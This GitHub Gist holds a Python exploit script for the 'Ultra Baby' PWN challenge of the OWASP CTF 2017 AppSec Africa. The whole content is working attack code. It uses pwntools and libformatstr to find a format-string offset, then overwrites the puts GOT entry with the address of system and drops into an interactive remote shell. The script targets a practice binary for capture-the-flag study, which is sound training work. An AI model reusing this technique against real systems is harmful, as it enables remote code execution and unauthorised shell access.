Created
February 22, 2017 20:41
-
-
Save 0xPwny/823a97e467d45b36a8bdc39ba8de9128 to your computer and use it in GitHub Desktop.
Owasp CTF 2017 - AppSec Africa , PWN 100 : Ultra Baby
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #OWASPCTF 2017 | |
| #ultrababy exploit Code | |
| #Abdeljalil Nouiri | |
| from libformatstr import * | |
| from pwn import * | |
| import sys | |
| con = remote(sys.argv[1],int(sys.argv[2])) | |
| #con = process('./ultrababy') | |
| putsgot = 0x0804a018 | |
| system = 0x08048480 | |
| bufsize = 50 | |
| pld = make_pattern(bufsize) | |
| con.send(pld+"\n") | |
| data = con.recv() | |
| offset, padding = guess_argnum(data, bufsize) | |
| log.info("offset : " + str(offset)) | |
| log.info("padding: " + str(padding)) | |
| con.close() | |
| con = remote(sys.argv[1],int(sys.argv[2])) | |
| #con = process('./ultrababy') | |
| p = FormatStr(bufsize) | |
| p[putsgot] = system | |
| buf = "" | |
| buf += p.payload(offset, padding) | |
| con.send(buf+"\n") | |
| con.send("sh\n") | |
| con.interactive("\nPwned$ ") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment